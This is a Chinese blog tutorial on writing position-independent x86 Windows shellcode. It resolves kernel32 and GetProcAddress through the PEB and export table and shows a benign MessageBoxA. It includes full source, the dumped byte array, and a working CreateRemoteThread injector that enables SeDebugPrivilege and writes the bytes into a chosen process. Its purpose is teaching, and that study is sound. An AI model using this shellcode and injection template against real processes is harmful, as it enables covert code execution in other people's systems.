编写简单的shellcode
一、shellcode要求:放在任意位置都能运行(即位置无关:代码中不能出现依赖加载基址的绝对地址,也不能依赖导入表/重定位表,所有API地址都要在运行时自行解析)
二、shellcode四大原则:
1、不能有全局变量
2、不能使用常量字符串
3、不能直接调用系统函数
4、不能嵌套调用其他函数
三、不同于之前的内存写入,shellcode不依赖于修复重定位表与IAT表.
四、shellcode编写的步骤
1、通过fs段寄存器得到线程结构体TEB(fs:[0]即TEB自身)
2、TEB偏移0x30处得到进程结构体PEB(fs:[0x30];此偏移仅对32位进程成立,64位下为gs:[0x60],本文代码只针对x86)
3、通过peb遍历得到Kernel32模块地址
4、再通过遍历kernel32导出表的名称表(AddressOfNames)得到GetProcAddress的地址
5、用GetProcAddress取得LoadLibraryA,加载user32.dll后再取得MessageBoxA函数地址
五、坑点:1、VS/VC默认会在函数中插入堆栈检查代码(如/GS安全Cookie对应的__security_check_cookie、/RTC基本运行时检查等),这些本质上是对CRT函数的调用,不符合shellcode编写的四大原则。我们可以在VS项目属性中关闭安全检查(/GS-)和基本运行时检查,之后生成的代码就不会再含有检查堆栈平衡的函数调用了
与此同时,基本运行时检查、运行库等选项要与上图保持一致
2、在winxp中遍历模块信息时,BaseDllName中dll的名称是小写的(kernel32.dll),但在win10系统下dll的名字是大写的(KERNEL32.DLL),大小写随系统版本而异,比较时要忽略大小写,不要只按一种写法硬匹配
3、创建数组的时候注意不要用 = {0} 之类的方式整体初始化(逐个列出字符元素的写法没问题,编译器只会生成逐字节的mov)
如图中,定义xchange数组时我们给其整体初始化为0,编译器直接生成了对memset的调用,这违反了"不能嵌套调用其他函数"的原则
六、shellcode代码如下(弹出MessageBoxA窗口)
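/********************************************************************
 * Minimal position-independent x86 shellcode that pops a MessageBoxA,
 * plus a helper that dumps its compiled bytes.
 *
 * Four rules the body of GetShellCode must obey so that its machine
 * code keeps working when copied to an arbitrary address:
 *   1. no global variables          (they live at fixed image addresses)
 *   2. no constant string literals  (they would be placed in .rdata)
 *   3. no direct calls to system/library functions (no IAT available)
 *   4. no calls into other functions (no helpers, no CRT, no memset)
 *
 * Resolution chain:
 *   fs:[0x30] -> PEB -> PEB.Ldr -> walk InLoadOrderModuleList
 *   -> kernel32 base -> parse its export table by hand -> GetProcAddress
 *   -> LoadLibraryA("user32.dll") -> MessageBoxA.
 *
 * Build notes (VC6 / VS, Win32 target): disable the /GS security cookie
 * and /RTC runtime checks, otherwise the compiler inserts calls to CRT
 * check routines, which violates rule 3. Build with incremental linking
 * or without -- PointCode handles both (see below).
 ********************************************************************/
#include "stdafx.h"
#include <windows.h>
#include <stdio.h>

#if !defined(_M_IX86)
#error "This shellcode is 32-bit only: fs:[0x30], the PEB/LDR offsets and the DWORD pointer arithmetic all assume x86."
#endif

/* Leading part of the undocumented PEB_LDR_DATA. Only the fields up to
 * the module lists are used; InLoadOrderModuleList sits at offset 0x0c
 * (Length 4 + Initialized 1 padded to 4 + SsHandle 4). */
typedef struct _PEB_LDR_DATA {
    DWORD      Length;
    bool       Initialized;     /* BOOLEAN in the real definition: one byte */
    PVOID      SsHandle;
    LIST_ENTRY InLoadOrderModuleList;
    LIST_ENTRY InMemoryOrderModuleList;
    LIST_ENTRY InInitializationOrderModuleList;
} PEB_LDR_DATA, *PPEB_LDR_DATA;

/* Counted UTF-16 string as used by ntdll; Length is in bytes. */
typedef struct _UNICODE_STRING {
    USHORT Length;
    USHORT MaximumLength;
    PWSTR  Buffer;
} UNICODE_STRING, *PUNICODE_STRING;

/* One loaded module. InLoadOrderLinks is the FIRST field, so a pointer
 * taken from InLoadOrderModuleList.Flink is also a pointer to the entry. */
typedef struct _LDR_DATA_TABLE_ENTRY {
    LIST_ENTRY     InLoadOrderLinks;
    LIST_ENTRY     InMemoryOrderLinks;
    LIST_ENTRY     InInitializationOrderLinks;
    PVOID          DllBase;
    PVOID          EntryPoint;
    UINT32         SizeOfImage;
    UNICODE_STRING FullDllName;
    UNICODE_STRING BaseDllName;
    UINT32         Flags;
    USHORT         LoadCount;
    USHORT         TlsIndex;
    LIST_ENTRY     HashLinks;
    PVOID          SectionPointer;
    UINT32         CheckSum;
    UINT32         TimeDateStamp;
    PVOID          LoadedImports;
    PVOID          EntryPointActivationContext;
    PVOID          PatchInformation;
} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;

void GetShellCode();
void PointCode();

int main(int argc, char* argv[])
{
    (void)argc;
    (void)argv;
    GetShellCode();   /* run the payload in-process once as a smoke test */
    PointCode();      /* then print its machine code as a C byte array */
    return 0;
}

/*
 * The payload. Everything it touches lives on the stack; the strings are
 * built as char arrays element by element, because an aggregate initializer
 * such as "= {0}" makes the compiler emit a memset call (rule 4).
 *
 * Returns silently if kernel32, GetProcAddress, LoadLibraryA, user32 or
 * MessageBoxA cannot be located, instead of calling through an
 * uninitialised or NULL pointer.
 */
void GetShellCode()
{
    typedef HMODULE (WINAPI *PLOADLIBRARYA)(LPCSTR);
    typedef FARPROC (WINAPI *PGETPROCADDRESS)(HMODULE, LPCSTR);
    typedef int     (WINAPI *PMESSAGEBOXA)(HWND, LPCSTR, LPCSTR, UINT);

    DWORD                 peb = 0;
    PPEB_LDR_DATA         ldr;
    PLIST_ENTRY           head;
    PLIST_ENTRY           link;
    PLDR_DATA_TABLE_ENTRY entry;
    DWORD                 kernelBase = 0;
    DWORD                 addrGetProcAddress = 0;
    PLOADLIBRARYA         pLoadLibraryA;
    PGETPROCADDRESS       pGetProcAddress;
    PMESSAGEBOXA          pMessageBoxA;
    HMODULE               hUser32;
    int                   i;

    /* UTF-16LE "kernel32.dll" in lower case; compared case-insensitively
     * below because BaseDllName is "kernel32.dll" on XP but "KERNEL32.DLL"
     * on Windows 10. */
    CHAR kernel32Name[] = {'k','\0','e','\0','r','\0','n','\0','e','\0','l','\0','3','\0','2','\0','.','\0','d','\0','l','\0','l','\0','\0','\0'};
    CHAR nameGetProcAddress[] = {'G','e','t','P','r','o','c','A','d','d','r','e','s','s',0};
    CHAR nameLoadLibraryA[]   = {'L','o','a','d','L','i','b','r','a','r','y','A',0};
    CHAR nameUser32[]         = {'u','s','e','r','3','2','.','d','l','l',0};
    CHAR nameMessageBoxA[]    = {'M','e','s','s','a','g','e','B','o','x','A',0};
    CHAR text[]               = {'H','E','L','L','O','W','O','R','L','D',0};

    /* 1. TEB is at fs:[0]; TEB+0x30 holds the PEB pointer (x86 only). */
    __asm {
        mov eax, fs:[0x30]
        mov peb, eax
    }

    /* 2. PEB+0x0c is Ldr. Walk InLoadOrderModuleList (exe, ntdll, kernel32,
     *    ...) and stop when we are back at the list head -- the head is not
     *    a module entry, so it must never be dereferenced as one. */
    ldr  = (PPEB_LDR_DATA)*(PDWORD)(peb + 0x0c);
    head = &ldr->InLoadOrderModuleList;
    for (link = head->Flink; link != head && link != NULL; link = link->Flink) {
        PWORD dllName;
        entry   = (PLDR_DATA_TABLE_ENTRY)link;          /* InLoadOrderLinks is the first field */
        dllName = (PWORD)entry->BaseDllName.Buffer;
        if (dllName == NULL)
            continue;
        for (i = 0; ; i++) {
            WORD c    = dllName[i];
            WORD want = ((PWORD)kernel32Name)[i];
            if (c >= 'A' && c <= 'Z')
                c = (WORD)(c + 0x20);                   /* fold ASCII upper case to lower */
            if (c != want)
                break;                                  /* mismatch, or one string ended early */
            if (want == 0) {                            /* both strings ended together: match */
                kernelBase = (DWORD)entry->DllBase;
                break;
            }
        }
        if (kernelBase != 0)
            break;
    }
    if (kernelBase == 0)
        return;

    /* 3. Parse kernel32's export directory by hand to find GetProcAddress.
     *    AddressOfNames and AddressOfNameOrdinals hold NumberOfNames entries,
     *    not NumberOfFunctions -- indexing them by NumberOfFunctions (or with
     *    "<=") reads past the end of the table. GetProcAddress is a real
     *    export of kernel32, so no forwarder handling is needed here. */
    {
        PIMAGE_DOS_HEADER       dos     = (PIMAGE_DOS_HEADER)kernelBase;
        PIMAGE_NT_HEADERS       nt      = (PIMAGE_NT_HEADERS)(kernelBase + dos->e_lfanew);
        PIMAGE_EXPORT_DIRECTORY exports = (PIMAGE_EXPORT_DIRECTORY)(kernelBase +
            nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
        PDWORD funcs    = (PDWORD)(kernelBase + exports->AddressOfFunctions);
        PDWORD names    = (PDWORD)(kernelBase + exports->AddressOfNames);
        PWORD  ordinals = (PWORD)(kernelBase + exports->AddressOfNameOrdinals);
        DWORD  n;

        for (n = 0; n < exports->NumberOfNames && addrGetProcAddress == 0; n++) {
            const char *name = (const char *)(kernelBase + names[n]);
            for (i = 0; ; i++) {
                if (name[i] != nameGetProcAddress[i])
                    break;
                if (name[i] == 0) {                     /* identical through the terminator */
                    addrGetProcAddress = kernelBase + funcs[ordinals[n]];
                    break;
                }
            }
        }
    }
    if (addrGetProcAddress == 0)
        return;

    /* 4. Bootstrap the remaining imports through GetProcAddress/LoadLibraryA. */
    pGetProcAddress = (PGETPROCADDRESS)addrGetProcAddress;
    pLoadLibraryA   = (PLOADLIBRARYA)pGetProcAddress((HMODULE)kernelBase, nameLoadLibraryA);
    if (pLoadLibraryA == NULL)
        return;
    hUser32 = pLoadLibraryA(nameUser32);
    if (hUser32 == NULL)
        return;
    pMessageBoxA = (PMESSAGEBOXA)pGetProcAddress(hUser32, nameMessageBoxA);
    if (pMessageBoxA == NULL)
        return;

    /* 5. The payload proper. */
    pMessageBoxA(NULL, text, NULL, MB_OK);
}

/* Number of bytes of GetShellCode to dump. This is the function size read
 * off the disassembly of this particular build; it must be re-measured
 * after any change to GetShellCode or to the compiler settings. */
#define SHELLCODE_DUMP_LEN 0x506

/*
 * Prints the machine code of GetShellCode as a C initializer list.
 *
 * With incremental linking (debug builds), &GetShellCode points at a 5-byte
 * "jmp rel32" thunk in the ILT rather than at the body, so the jump is
 * followed first. A release build without /INCREMENTAL points straight at
 * the body; that case is detected by the absence of the 0xE9 opcode, where
 * the original unconditionally decoded a jump and would have dumped garbage.
 * A trailing 0xC3 (ret) is appended as a safety net should the measured
 * length fall short of the real epilogue.
 */
void PointCode()
{
    const BYTE *code = (const BYTE *)GetShellCode;
    int i;

    if (code[0] == 0xE9) {                              /* jmp rel32: target = next insn + rel32 */
        code = code + 5 + *(const LONG *)(code + 1);
    }

    printf("截取的shellcode是:\n");
    printf("shellcode[] = {");
    for (i = 0; i < SHELLCODE_DUMP_LEN; i++) {
        printf("0x%x,", (unsigned)code[i]);
        if (i % 20 == 0)
            printf("\n");
    }
    printf("0xc3};");
    printf("\n");
}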
七、得到提取的shellcode
八、检验运行
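// Test harness for the byte array produced by PointCode: copies it into a
// target process and starts it on a remote thread.
// Built with VC++ on Windows XP; the author reports the resulting binary also
// runs on Windows 10. The payload is x86, so the target must be a 32-bit
// process.
#include "stdafx.h"
#include <windows.h>
#include <stdio.h>

void InjectShellCode();

/*
 * Enables SeDebugPrivilege in the current process token so OpenProcess can
 * reach processes owned by other users. Returns TRUE on success.
 * AdjustTokenPrivileges returns TRUE even when the privilege is not held by
 * the token (GetLastError() == ERROR_NOT_ALL_ASSIGNED), hence the explicit
 * GetLastError check. Not required for processes the current user owns.
 */
BOOL EnableDebugPrivilege()
{
    HANDLE           hToken = NULL;
    BOOL             ok     = FALSE;
    TOKEN_PRIVILEGES tp;

    if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken))
        return FALSE;

    tp.PrivilegeCount           = 1;
    tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
    if (LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tp.Privileges[0].Luid)) {
        AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(tp), NULL, NULL);
        ok = (GetLastError() == ERROR_SUCCESS);
    }
    CloseHandle(hToken);
    return ok;
}

int main(int argc, char* argv[])
{
    (void)argc;
    (void)argv;
    EnableDebugPrivilege();   /* best effort: injection into the user's own processes works without it */
    InjectShellCode();
    return 0;
}

/*
 * Classic CreateRemoteThread injection:
 *   1. open the target by PID (entered in decimal, as Task Manager shows it;
 *      the original read it with "%x", so a decimal PID selected the wrong
 *      process),
 *   2. allocate one page read/write, copy the payload, then flip the page
 *      to execute/read (W^X: the target never holds a writable+executable
 *      page),
 *   3. start a remote thread at the page.
 * The copy length is sizeof(shellcode) -- 0x4DA bytes, the same value the
 * original hard-coded as an address difference taken from the disassembler.
 * Every Win32 call is checked; the process handle is closed on all paths and
 * the remote page is released if the thread could not be started.
 */
void InjectShellCode()
{
    BYTE shellcode[] = {
        0x55, 0x8b,0xec,0x81,0xec,0x10,0x1,0x0,0x0,0x53,0x56,0x57,0xc7,0x45,0xfc,0x0,0x0,0x0,0x0,0xc7,0x45,
        0xe0,0x0,0x0,0x0,0x0,0xc7,0x45,0xdc,0x0,0x0,0x0,0x0,0xc7,0x45,0xd8,0x0,0x0,0x0,0x0,0xc6,
        0x45,0xbc,0x6b,0xc6,0x45,0xbd,0x0,0xc6,0x45,0xbe,0x65,0xc6,0x45,0xbf,0x0,0xc6,0x45,0xc0,0x72,0xc6,
        0x45,0xc1,0x0,0xc6,0x45,0xc2,0x6e,0xc6,0x45,0xc3,0x0,0xc6,0x45,0xc4,0x65,0xc6,0x45,0xc5,0x0,0xc6,
        0x45,0xc6,0x6c,0xc6,0x45,0xc7,0x0,0xc6,0x45,0xc8,0x33,0xc6,0x45,0xc9,0x0,0xc6,0x45,0xca,0x32,0xc6,
        0x45,0xcb,0x0,0xc6,0x45,0xcc,0x2e,0xc6,0x45,0xcd,0x0,0xc6,0x45,0xce,0x64,0xc6,0x45,0xcf,0x0,0xc6,
        0x45,0xd0,0x6c,0xc6,0x45,0xd1,0x0,0xc6,0x45,0xd2,0x6c,0xc6,0x45,0xd3,0x0,0xc6,0x45,0xd4,0x0,0xc6,
        0x45,0xd5,0x0,0xc6,0x45,0xac,0x47,0xc6,0x45,0xad,0x65,0xc6,0x45,0xae,0x74,0xc6,0x45,0xaf,0x50,0xc6,
        0x45,0xb0,0x72,0xc6,0x45,0xb1,0x6f,0xc6,0x45,0xb2,0x63,0xc6,0x45,0xb3,0x41,0xc6,0x45,0xb4,0x64,0xc6,
        0x45,0xb5,0x64,0xc6,0x45,0xb6,0x72,0xc6,0x45,0xb7,0x65,0xc6,0x45,0xb8,0x73,0xc6,0x45,0xb9,0x73,0xc6,
        0x45,0xba,0x0,0xc6,0x45,0xa0,0x48,0xc6,0x45,0xa1,0x45,0xc6,0x45,0xa2,0x4c,0xc6,0x45,0xa3,0x4c,0xc6,
        0x45,0xa4,0x4f,0xc6,0x45,0xa5,0x57,0xc6,0x45,0xa6,0x4f,0xc6,0x45,0xa7,0x52,0xc6,0x45,0xa8,0x4c,0xc6,
        0x45,0xa9,0x44,0xc6,0x45,0xaa,0x0,0xc6,0x45,0x90,0x4c,0xc6,0x45,0x91,0x6f,0xc6,0x45,0x92,0x61,0xc6,
        0x45,0x93,0x64,0xc6,0x45,0x94,0x4c,0xc6,0x45,0x95,0x69,0xc6,0x45,0x96,0x62,0xc6,0x45,0x97,0x72,0xc6,
        0x45,0x98,0x61,0xc6,0x45,0x99,0x72,0xc6,0x45,0x9a,0x79,0xc6,0x45,0x9b,0x41,0xc6,0x45,0x9c,0x0,0xc6,
        0x45,0x84,0x75,0xc6,0x45,0x85,0x73,0xc6,0x45,0x86,0x65,0xc6,0x45,0x87,0x72,0xc6,0x45,0x88,0x33,0xc6,
        0x45,0x89,0x32,0xc6,0x45,0x8a,0x2e,0xc6,0x45,0x8b,0x64,0xc6,0x45,0x8c,0x6c,0xc6,0x45,0x8d,0x6c,0xc6,
        0x45,0x8e,0x0,0xc6,0x85,0x78,0xff,0xff,0xff,0x4d,0xc6,0x85,0x79,0xff,0xff,0xff,0x65,0xc6,0x85,0x7a,
        0xff,0xff,0xff,0x73,0xc6,0x85,0x7b,0xff,0xff,0xff,0x73,0xc6,0x85,0x7c,0xff,0xff,0xff,0x61,0xc6,0x85,
        0x7d,0xff,0xff,0xff,0x67,0xc6,0x85,0x7e,0xff,0xff,0xff,0x65,0xc6,0x85,0x7f,0xff,0xff,0xff,0x42,0xc6,
        0x45,0x80,0x6f,0xc6,0x45,0x81,0x78,0xc6,0x45,0x82,0x41,0xc6,0x45,0x83,0x0,0x64,0xa1,0x30,0x0,0x0,
        0x0,0x89,0x45,0xf8,0x8b,0x45,0xf8,0x8b,0x48,0xc,0x89,0x4d,0xf4,0x8b,0x45,0xf4,0x83,0xc0,0xc,0x89,
        0x45,0xf0,0x8b,0x45,0xf0,0x8b,0x8,0x89,0x4d,0xec,0x8b,0x45,0xec,0x89,0x45,0xf0,0xc7,0x85,0x74,0xff,
        0xff,0xff,0x0,0x0,0x0,0x0,0x8b,0x45,0xec,0x8b,0x48,0x30,0x89,0x8d,0x70,0xff,0xff,0xff,0x8b,0x85,
        0x74,0xff,0xff,0xff,0x8b,0x8d,0x70,0xff,0xff,0xff,0xf,0xb7,0x14,0x41,0x85,0xd2,0xf,0x84,0x9f,0x0,
        0x0,0x0,0x8b,0x85,0x74,0xff,0xff,0xff,0xf,0xb7,0x4c,0x45,0xbc,0x85,0xc9,0xf,0x84,0x8c,0x0,0x0,
        0x0,0x8b,0x85,0x74,0xff,0xff,0xff,0x8b,0x8d,0x70,0xff,0xff,0xff,0xf,0xb7,0x14,0x41,0x8b,0x85,0x74,
        0xff,0xff,0xff,0xf,0xb7,0x4c,0x45,0xbc,0x3b,0xd1,0x74,0x24,0x8b,0x85,0x74,0xff,0xff,0xff,0x8b,0x8d,
        0x70,0xff,0xff,0xff,0xf,0xb7,0x14,0x41,0x8b,0x85,0x74,0xff,0xff,0xff,0xf,0xb7,0x4c,0x45,0xbc,0x83,
        0xe9,0x20,0x3b,0xd1,0x74,0x2,0xeb,0x49,0x8b,0x85,0x74,0xff,0xff,0xff,0x83,0xc0,0x1,0x89,0x85,0x74,
        0xff,0xff,0xff,0x8b,0x85,0x74,0xff,0xff,0xff,0x8b,0x8d,0x70,0xff,0xff,0xff,0xf,0xb7,0x14,0x41,0x85,
        0xd2,0x75,0x21,0x8b,0x85,0x74,0xff,0xff,0xff,0xf,0xb7,0x4c,0x45,0xbc,0x85,0xc9,0x75,0x12,0xc7,0x45,
        0xfc,0x1,0x0,0x0,0x0,0x8b,0x45,0xec,0x8b,0x48,0x18,0x89,0x4d,0xe8,0xeb,0x5,0xe9,0x49,0xff,0xff,
        0xff,0x8b,0x45,0xec,0x8b,0x8,0x89,0x4d,0xec,0x8b,0x45,0xf0,0x3b,0x45,0xec,0x74,0x16,0x83,0x7d,0xf0,
        0x0,0x74,0x10,0x83,0x7d,0xec,0x0,0x74,0xa,0x83,0x7d,0xfc,0x0,0xf,0x84,0xd,0xff,0xff,0xff,0x8b,
        0x45,0xe8,0x89,0x85,0x6c,0xff,0xff,0xff,0x8b,0x85,0x6c,0xff,0xff,0xff,0x8b,0x8d,0x6c,0xff,0xff,0xff,
        0x3,0x48,0x3c,0x89,0x8d,0x68,0xff,0xff,0xff,0x8b,0x85,0x6c,0xff,0xff,0xff,0x8b,0x48,0x3c,0x8b,0x95,
        0x6c,0xff,0xff,0xff,0x8d,0x44,0xa,0x4,0x89,0x85,0x64,0xff,0xff,0xff,0x8b,0x85,0x64,0xff,0xff,0xff,
        0x83,0xc0,0x14,0x89,0x85,0x60,0xff,0xff,0xff,0x8b,0x85,0x64,0xff,0xff,0xff,0xf,0xb7,0x48,0x10,0x3,
        0x8d,0x60,0xff,0xff,0xff,0x89,0x8d,0x5c,0xff,0xff,0xff,0x8b,0x85,0x60,0xff,0xff,0xff,0x8b,0x4d,0xe8,
        0x3,0x48,0x60,0x89,0x8d,0x58,0xff,0xff,0xff,0x8b,0x85,0x58,0xff,0xff,0xff,0x8b,0x4d,0xe8,0x3,0x48,
        0x1c,0x89,0x8d,0x54,0xff,0xff,0xff,0x8b,0x85,0x58,0xff,0xff,0xff,0x8b,0x4d,0xe8,0x3,0x48,0x20,0x89,
        0x8d,0x50,0xff,0xff,0xff,0x8b,0x85,0x58,0xff,0xff,0xff,0x8b,0x4d,0xe8,0x3,0x48,0x24,0x89,0x8d,0x4c,
        0xff,0xff,0xff,0x8b,0x85,0x58,0xff,0xff,0xff,0x8b,0x48,0x14,0x89,0x8d,0x48,0xff,0xff,0xff,0xc7,0x85,
        0x44,0xff,0xff,0xff,0x0,0x0,0x0,0x0,0xc7,0x85,0x40,0xff,0xff,0xff,0x0,0x0,0x0,0x0,0x8b,0x85,
        0x44,0xff,0xff,0xff,0x3b,0x85,0x48,0xff,0xff,0xff,0xf,0x87,0xfc,0x0,0x0,0x0,0x83,0xbd,0x40,0xff,
        0xff,0xff,0x0,0xf,0x85,0xef,0x0,0x0,0x0,0x8b,0x85,0x44,0xff,0xff,0xff,0x8b,0x8d,0x50,0xff,0xff,
        0xff,0x8b,0x14,0x81,0x3,0x55,0xe8,0x89,0x95,0x3c,0xff,0xff,0xff,0xc7,0x85,0x38,0xff,0xff,0xff,0x0,
        0x0,0x0,0x0,0x8b,0x85,0x3c,0xff,0xff,0xff,0x3,0x85,0x38,0xff,0xff,0xff,0xf,0xbe,0x8,0x85,0xc9,
        0xf,0x84,0xa2,0x0,0x0,0x0,0x8b,0x85,0x38,0xff,0xff,0xff,0xf,0xbe,0x4c,0x5,0xac,0x85,0xc9,0xf,
        0x84,0x8f,0x0,0x0,0x0,0x8b,0x85,0x3c,0xff,0xff,0xff,0x3,0x85,0x38,0xff,0xff,0xff,0xf,0xbe,0x8,
        0x8b,0x95,0x38,0xff,0xff,0xff,0xf,0xbe,0x44,0x15,0xac,0x3b,0xc8,0x74,0x4,0xeb,0x6f,0xeb,0xf,0x8b,
        0x85,0x38,0xff,0xff,0xff,0x83,0xc0,0x1,0x89,0x85,0x38,0xff,0xff,0xff,0x8b,0x85,0x3c,0xff,0xff,0xff,
        0x3,0x85,0x38,0xff,0xff,0xff,0xf,0xbe,0x8,0x85,0xc9,0x75,0x46,0x8b,0x85,0x38,0xff,0xff,0xff,0xf,
        0xbe,0x4c,0x5,0xac,0x85,0xc9,0x75,0x37,0x8b,0x85,0x44,0xff,0xff,0xff,0x8b,0x8d,0x4c,0xff,0xff,0xff,
        0xf,0xb7,0x14,0x41,0x89,0x95,0x34,0xff,0xff,0xff,0x8b,0x85,0x34,0xff,0xff,0xff,0x8b,0x8d,0x54,0xff,
        0xff,0xff,0x8b,0x14,0x81,0x3,0x55,0xe8,0x89,0x55,0xe4,0xc7,0x85,0x40,0xff,0xff,0xff,0x1,0x0,0x0,
        0x0,0xeb,0x5,0xe9,0x47,0xff,0xff,0xff,0x8b,0x85,0x44,0xff,0xff,0xff,0x83,0xc0,0x1,0x89,0x85,0x44,
        0xff,0xff,0xff,0xe9,0xf2,0xfe,0xff,0xff,0x8b,0x45,0xe4,0x89,0x45,0xdc,0x8d,0x45,0x90,0x50,0x8b,0x4d,
        0xe8,0x51,0xff,0x55,0xdc,0x89,0x45,0xe0,0x8d,0x45,0x84,0x50,0xff,0x55,0xe0,0x89,0x85,0x30,0xff,0xff,
        0xff,0x8d,0x85,0x78,0xff,0xff,0xff,0x50,0x8b,0x8d,0x30,0xff,0xff,0xff,0x51,0xff,0x55,0xdc,0x89,0x45,
        0xd8,0x6a,0x0,0x6a,0x0,0x8d,0x45,0xa0,0x50,0x6a,0x0,0xff,0x55,0xd8,0x5f,0x5e,0x5b,0x8b,0xe5,0x5d,
        0xc3
    };
    const DWORD pageSize   = 0x1000;          /* one page is plenty for a 0x4DA-byte payload */
    DWORD       pid        = 0;
    HANDLE      hProcess   = NULL;
    HANDLE      hThread    = NULL;
    LPVOID      remote     = NULL;
    DWORD       written    = 0;
    DWORD       oldProtect = 0;

    printf("请输入要注入进程的PID(十进制):\n");
    if (scanf("%lu", &pid) != 1) {
        printf("无效的PID\n");
        return;
    }

    /* Request only the rights the calls below need instead of PROCESS_ALL_ACCESS. */
    hProcess = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION |
                           PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ,
                           FALSE, pid);
    if (hProcess == NULL) {
        printf("OpenProcess failed: %lu\n", GetLastError());
        return;
    }

    /* Allocate RW first; execute permission is granted only after the copy. */
    remote = VirtualAllocEx(hProcess, NULL, pageSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (remote == NULL) {
        printf("VirtualAllocEx failed: %lu\n", GetLastError());
        goto done;
    }

    if (!WriteProcessMemory(hProcess, remote, shellcode, sizeof(shellcode), &written) ||
        written != sizeof(shellcode)) {
        printf("WriteProcessMemory failed: %lu\n", GetLastError());
        goto free_remote;
    }

    if (!VirtualProtectEx(hProcess, remote, pageSize, PAGE_EXECUTE_READ, &oldProtect)) {
        printf("VirtualProtectEx failed: %lu\n", GetLastError());
        goto free_remote;
    }

    hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)remote, NULL, 0, NULL);
    if (hThread == NULL) {
        printf("CreateRemoteThread failed: %lu\n", GetLastError());
        goto free_remote;
    }
    CloseHandle(hThread);     /* the thread keeps running; we only drop our handle */
    printf("完成\n");
    goto done;                /* the page now belongs to the running payload: do not free it */

free_remote:
    VirtualFreeEx(hProcess, remote, 0, MEM_RELEASE);
done:
    CloseHandle(hProcess);
}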
九、
成功。。。
ps:该文借鉴了一些hambaga师傅对处理堆栈检查函数的操作
本文作者:_TLSN
本文链接:https://www.cnblogs.com/lordtianqiyi/articles/hambaga.html